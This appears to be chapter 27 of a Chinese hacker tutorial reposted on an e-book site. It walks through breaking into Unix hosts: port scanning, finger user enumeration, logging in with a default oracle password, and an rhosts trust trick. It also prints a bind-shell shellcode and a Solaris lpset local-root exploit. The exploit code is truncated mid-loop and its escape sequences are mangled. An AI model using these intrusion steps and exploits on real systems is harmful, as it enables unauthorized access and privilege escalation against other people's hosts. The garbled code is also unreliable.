《30天打造专业红客》第27章


root:Unix里最高权限的用户。也就是超级管理员。
admin:Windows NT里最高权限的用户。也就是超级管理员。
rootshell:通过一个溢出程序,在主机溢出一个具有root权限的shell。
exploit:溢出程序。exploit里通常包含一些shellcode。
shellcode:溢出攻击要调用API函数,溢出后要有一个交换式界面进行操作。所以就有了shell的code。
char shellcode'' = 〃x31xdbx31xc9x31xc0xb0x46xcdx80〃 〃x89xe5x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8〃 〃x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89〃 〃x45xf4x43x66x89x5dxecx66xc7x45xeex0fx27x89x4dxf0〃 〃x8dx45xecx89x45xf8xc6x45xfcx10x89xd0x8dx4dxf4xcd〃 〃x80x89xd0x43x43xcdx80x89xd0x43xcdx80x89xc3x31xc9〃 〃xb2x3fx89xd0xcdx80x89xd0x41xcdx80xebx18x5ex89x75〃 〃x08x31xc0x88x46x07x89x45x0cxb0x0bx89xf3x8dx4dx08〃 〃x8dx55x0cxcdx80xe8xe3xffxffxff/bin/sh〃;
这就是一个shellcode。
找一个Unix主机也是一种技巧。
1、首先,我们打开superscan。
设置:
IP:(需要扫描的IP地址。)
Start:127。0。0。1
Stop:127。0。0。255
Scan Type:(扫描类型设置。)
All ports from:23|23
然后,点击“Start”,开始扫描。 
2、点击“Prune”,把多余的主机删除。 
3、点击“Expand All”,把所有扫描到的主机打开。这时,在端口下面就会显示一些信息。这些信息就是端口的响应。 
小技巧: 
。。。。。。。。#。。"。。:这种响应,通常是Sunos主机的。 
。。。。。 。。#。。":这种响应,通常是liunx的。 
假设,我们扫描到:127。0。0。17。 
打开,Windows自带的“命令提示符”。
ping 主机:
主要目的是查看主机是否能连接。
D:》ping 127。0。0。17
Pinging 127。0。0。17 with 32 bytes of data:
Reply from 127。0。0。17: bytes=32 time=191ms TTL=241
Reply from 127。0。0。17: bytes=32 time=170ms TTL=241
Reply from 127。0。0。17: bytes=32 time=160ms TTL=241
Reply from 127。0。0。17: bytes=32 time=170ms TTL=241
Ping statistics for 127。0。0。17:
Packets: Sent = 4; Received = 4; Lost = 0 (0% loss);
Approximate round trip times in milli…seconds:
Minimum = 160ms; Maximum = 191ms; Average = 172ms
小技巧:
通常 TTL 》 200的,都是liunx或者unix系统。
TTL 《 200的,都是Windows 9x或Windows NT系统。
tel主机:
主要看看tel的banner。
D:》tel 127。0。0。17
SunOS 5。7
login:
solaris 7 的。
接着,我用Superscan扫描主机的端口。
方法:
打开superscan。
设置:
IP:
Start:127。0。0。17
Stop:127。0。0。17
Scan Type:(扫描类型设置。)
All ports from:1|65535
然后,点击“Start”,开始扫描。 
扫描完毕后,点击“Expand All”,把所有扫描到的端口打开。 
* + 211。99。25。1
|___ 7 Echo
|___ 9 Discard
|___ 13 Daytime
|___ 19 Character Generator
|___ 21 File Transfer Protocol 'Control'
|___ 23 Tel
|___ 25 Simple Mail Transfer
|___ 37 Time
|___ 53 Domain Name Server
|___ 79 Finger
|___ 111 SUN Remote Procedure Call
|___ 512 remote process execution;
|___ 513 remote login a la tel;
|___ 514 cmd
|___ 515 spooler
|___ 540 uucpd
主要的端口有:21、25、53、79、111、513
其他还有:22、80等
端口的主要漏洞:
21:FTP的端口。主要漏洞是ftpd。如果允许anonymous(匿名)用户,而且具有读写权限,那么那台机子就是你的啦。假如你具有读写权限的用户密码,那就更加容易了。
22:ssh的端口。例如:SSH 3。0的远程登录漏洞等。
25:sendmail的端口。利用它的漏洞,我们可以D。O。S主机。freebsd的8。8。3版本还可以远程溢出rootshell。
53:DNS的端口。主要漏洞是bind。对于bind 8。2的DNS服务器,我们可以利用exploit溢出一个rootshell。
79:finger的端口。在unix和liunx都很有作用。对于Sunos,我们可以 finger 0@***。***。***。*** 刺探用户。对于,liunx可以 finger @***。***。***。*** 刺探当前在线的用户。
80:web的端口。这个端口就是我们平时浏览网站的默认端口。主要的漏洞有CGI漏洞。
111:rpc的端口。rpc漏洞是当今最流行的漏洞之一。每一个漏洞都可以远程溢出rootshell。例如:redhat的rpc。statd,Solaris的rpc。ttdbserverd等。
513:rlogin的端口。你可以向主机发送一条:echo "+ +" 》/。rhost 如果成功,就可以不用密码rlogin到主机。
finger主机。
目的是利用finger漏洞寻找主机的用户。(取得主机的用户对入侵主机有很大帮助。)
D:》finger 0@127。0。0。17
'127。0。0。17'
Login NameTTYIdle When Where
daemon ??? 《 。 。 。 。 》
bin ??? 《 。 。 。 。 》
sys ??? 《 。 。 。 。 》
chenhy ???pts/7 61。158。255。225
mdevice???897 61。140。253。142
liuy???pts/5 211。101。132。50
oracle ???console 6:57 Mon 14:29 :0
oracle ???pts/24d Mon 14:29 :0。0
oracle ???pts/522 Sat 16:34 61。140。253。142
D:》
存在finger漏洞。系统的用户显示出来了。(chenhy、mdevice、liuy、orcle)
oracle,通常oracle的密码就是oracle。
马上试一下!
D:》tel 127。0。0。17
SunOS 5。7
login: oracle
Password:
Last login: Sat Aug 4 17:25:49 from 61。140。253。142
Sun Microsystems Inc。SunOS 5。7 Generic October 1998
成功了!
假如在这一步并没有猜到用户的密码,我们可以利用其他工具继续猜测。
命令:uname …a
查看主机的信息。 
uname …a
SunOS mars 5。7 Generic_106541…08 sun4u sparc SUNW;Ultra…5_10
SunOS mars 5。7:SunOS的版本。
sparc:服务器版本。
Generic_106541…08:补丁情况。
找到exploit:lpset。c
cat 》lpst。c
/*## copyright LAST STAGE OF DELIRIUM apr 2000 poland *://lsd…pl。/ #*/
/*## /usr/bin/lpset #*/
#define NOPNUM 864
#define ADRNUM 132
#define ALLIGN 3
char shellcode''=
〃x20xbfxffxff〃 /* bn;a */
〃x20xbfxffxff〃 /* bn;a */
〃x7fxffxffxff〃 /* call */
〃x90x03xe0x20〃 /* add %o7;32;%o0 */
〃x92x02x20x10〃 /* add %o0;16;%o1 */
〃xc0x22x20x08〃 /* st%g0;'%o0+8' */
〃xd0x22x20x10〃 /* st%o0;'%o0+16'*/
〃xc0x22x20x14〃 /* st%g0;'%o0+20'*/
〃x82x10x20x0b〃 /* mov 0xb;%g1 */
〃x91xd0x20x08〃 /* ta8 */
〃/bin/ksh〃

char jump''=
〃x81xc3xe0x08〃 /* jmp %o7+8 */
〃x90x10x00x0e〃 /* mov %sp;%o0 */

static char nop''=〃x80x1cx40x11〃;
main(int argc;char **argv){
char buffer'10000';adr'4';*b;
int i;
printf(〃copyright LAST STAGE OF DELIRIUM apr 2000 poland //lsd…pl。/n〃);
printf(〃/usr/bin/lpset for solaris 2。6 2。7 sparcnn〃);
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10088+400;
b=buffer;
sprintf(b;〃***=〃);
b+=4;
for(i=0;i
小说推荐
返回首页返回目录
麒麟书城提供完结TXT手机电子书下载,好看的完本小说在线阅读!官方网址:www.ql40.com
本小说网所有小说、TXT电子书、发帖和书评均为网友更新!仅代表发表者个人行为,与麒麟书城(www.ql40.com)立场无关!
麒麟书城拒绝任何色情黄色小说,一经发现,立即删除!
本站所有小说的版权为原作者及合法拥有者所有!如无意侵犯到您的权益,请联系,我们会对您的反馈及时处理!
麒麟书城 www.ql40.com